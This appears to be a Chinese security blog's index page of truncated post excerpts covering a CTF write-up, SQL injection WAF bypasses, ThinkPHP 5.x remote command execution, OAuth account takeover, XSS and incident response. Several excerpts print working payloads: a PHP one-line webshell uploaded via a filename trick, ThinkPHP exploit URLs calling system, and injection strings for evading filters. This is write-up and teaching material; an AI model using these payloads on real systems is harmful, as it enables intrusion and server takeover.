Web
手速要快
打开给了个登录框要密码。密码在消息头里就给出了。
登陆后要上传文件:
上传个一句话木马上去:
$ cat 1.jpg
<?php @eval($_POST['h']);?>
在bp里改成1.php.jpg后上传成功:
可以看到已经getshell:
flag在上一级目录里:
easy audit
打开给了一串随机数,并告诉有一些有趣的方法在flag.php里。F12查看源码提示了index.php?func1:
...
安恒杯2018年10月月赛WriteUp
skysql之union绕waf
前记
以前校赛的时候出了一道skysql
灵感来自于bendawang师傅的一篇博客(像巨佬致敬orz)
今天正好有空写了一下题解
题目解法
题目过滤比较严格
盲注和报错注入都不太容易实现
但是不难发现
单个fuzz的话
union和select都没有被过滤
但是联合一起的话,union select是被过滤的
所以我可以猜想他的waf正则写法是:
1
|union select|
所以我们可以尝试绕过
1
union%0bselect
此时发现...
阿里云OSS约等于文件上传漏洞?
首先声明这是一篇标题党的文章,阿里云OSS不被这个锅,锅其实还是在企业或者说是用户。
前言
之所以要写这篇口水文,是因为最近在检测自家公司产品时发现存在这个问题,同时不久在测试某src的某系统时也存在类似这种问题,所以个人认为还是要提高一些警惕,让开发或测试者尽量消除不必要的麻烦,不要错误的认为文件托管在oss就可以忽略站内的上传功能存在的安全隐患。
概述
首先借用阿里云oss首页的介绍性...
渗透测试之子域名探测指南
原文链接:https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6
前言
作为一名渗透测试人员,或者说一个漏洞赏金猎人,一般情况下,当您进行安全测试时,您将获得一个或一组域名。您必须进行广泛的信息搜集,以找到有用的信息,如服务器,Web应用程序,属于目标组织的域等,从而增加您找到漏洞的机会。
我们撰写了一篇关于技术博文(https://blog.appsecco.com/...
组合漏洞导致的账号劫持
Login CSRF + DOM-XSS + unsafe URL redirect = ATO
在最近参与的一次对站点A的众测中,我发现A可以使用QQ账号进行登陆。在过去的几个月里,我发现了大量关于OAuth登陆劫持的漏洞,如果你有兴趣,可以参考:OAuth回调参数漏洞案例解析
尽管我相信目标A已经不存在OAuth登陆劫持漏洞(因为QQ已经在redirect_uri参数上做了强校验),但是我仍打算对它的登陆流程一探究竟。
下面,我以A.com代表目标A的域名来...
thinkphp 5.0-5.1 命令执行流水账记录
0x00 没有开头
0x01 文章参考
0x00 没有开头
环境部署安排一下

bt一键部署:配合泛解析域名,轻松部署环境
漏洞复现 qq.com为vuln host
http://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id
//5.1
http://qq.com/?s=index/\think\Request/input&filter=phpinfo&data=1
http://qq.com/?s=index/\think\template...
黑客入侵应急分析手工排查
Author: [email protected]猎户攻防实验室
行文仓促,不足之处,还望大牛指正。
1 事件分类
常见的安全事件:
Web入侵:挂马、篡改、Webshell
系统入侵:系统异常、RDP爆破、SSH爆破、主机漏洞
病毒木马:远控、后门、勒索软件
信息泄漏:脱裤、数据库登录(弱口令)
网络流量:频繁发包、批量请求、DDOS攻击
2 排查思路
一个常规的入侵事件后的系统排查思路:
文件分析
a) 文件日期、新增文件、可疑/异常文件、...
记一次Java反序列化漏洞的发现和修复
作者:[email protected]勾陈安全
0x00 背景简介
本文是自己对一次反序列化漏洞的发现和修复过程,如有错误请斧正,大神请轻喷。
目标应用系统是典型的CS模式。
客户端是需要安装的windows桌面程序,但是它是大部分内容都是基于Java开发(安装目录有很多Jar包)。
服务端是基于Jboss开发。
客户端和服务端之间的通信流量是序列化了的数据流量。客户端接收和解析数据流量的模式和服务端一样,也是通过http服务,它在本地...
XSS攻击及防御
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。
XSS攻击
XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在X...
密码保护:bypass最新版安全狗
环境
系统:win7x64+phpstudy+安全狗apache版 v4.0
站点:sqli-labs
bypass
Mysql 注释符:# , -- , /*...*/
Mysql 空白字符:%09,%0a,%0b,%0c,%0d,%20,%a0
绕过 and 1=1
首先判断是否有注入点:
正常情况:http://192.11.22.55/sqli/Less-1/?id=1' and 1=1 %23 (安全狗拦截)
把and 1=1拆分:
http://192.11.22.55/sqli/Less-1/?id=1' and %23 (安全狗不拦截)
所以要把and和1=1当成两部分,在它们之间进行...